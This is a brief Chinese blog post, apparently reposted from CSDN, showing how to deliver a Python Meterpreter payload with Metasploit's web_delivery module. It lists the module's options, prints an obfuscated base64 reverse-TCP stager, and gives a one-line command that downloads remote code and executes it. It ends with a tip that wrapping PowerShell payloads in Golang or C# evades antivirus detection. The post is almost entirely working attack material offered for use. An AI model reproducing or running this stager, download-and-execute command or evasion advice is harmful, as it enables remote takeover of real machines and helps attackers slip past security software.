Pyhton載入MeterpreterWeb_delivery程式碼

神棍先生發表於2017-08-25

版權宣告:本文可能為博主原創文章,若標明出處可隨便轉載。 https://blog.csdn.net/Jailman/article/details/77574162

Webdelivery的options
Module options (exploit/multi/script/web_delivery):
Name Current Setting Required Description
—- ————— ——– ———–
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH /test no The URI to use for this exploit (default is random)
Payload options (python/meterpreter/reverse_tcp):
Name Current Setting Required Description
—- ————— ——– ———–
LHOST 127.0.0.1 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
— —-
0 Python
生成的檔案內容
import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,`UTF-8`)}[sys.version_info[0]](`aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCcxMjcuMC4wLjEnLDQ0NDQpKQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK`)))
呼叫命令
python -c “import urllib2; r = urllib2.urlopen(`http://127.0.0.1:8080/test`); exec(r.read());”
使用PowerShell執行的payload語句可以封裝到golang或者C#中實現免殺的目的


相關文章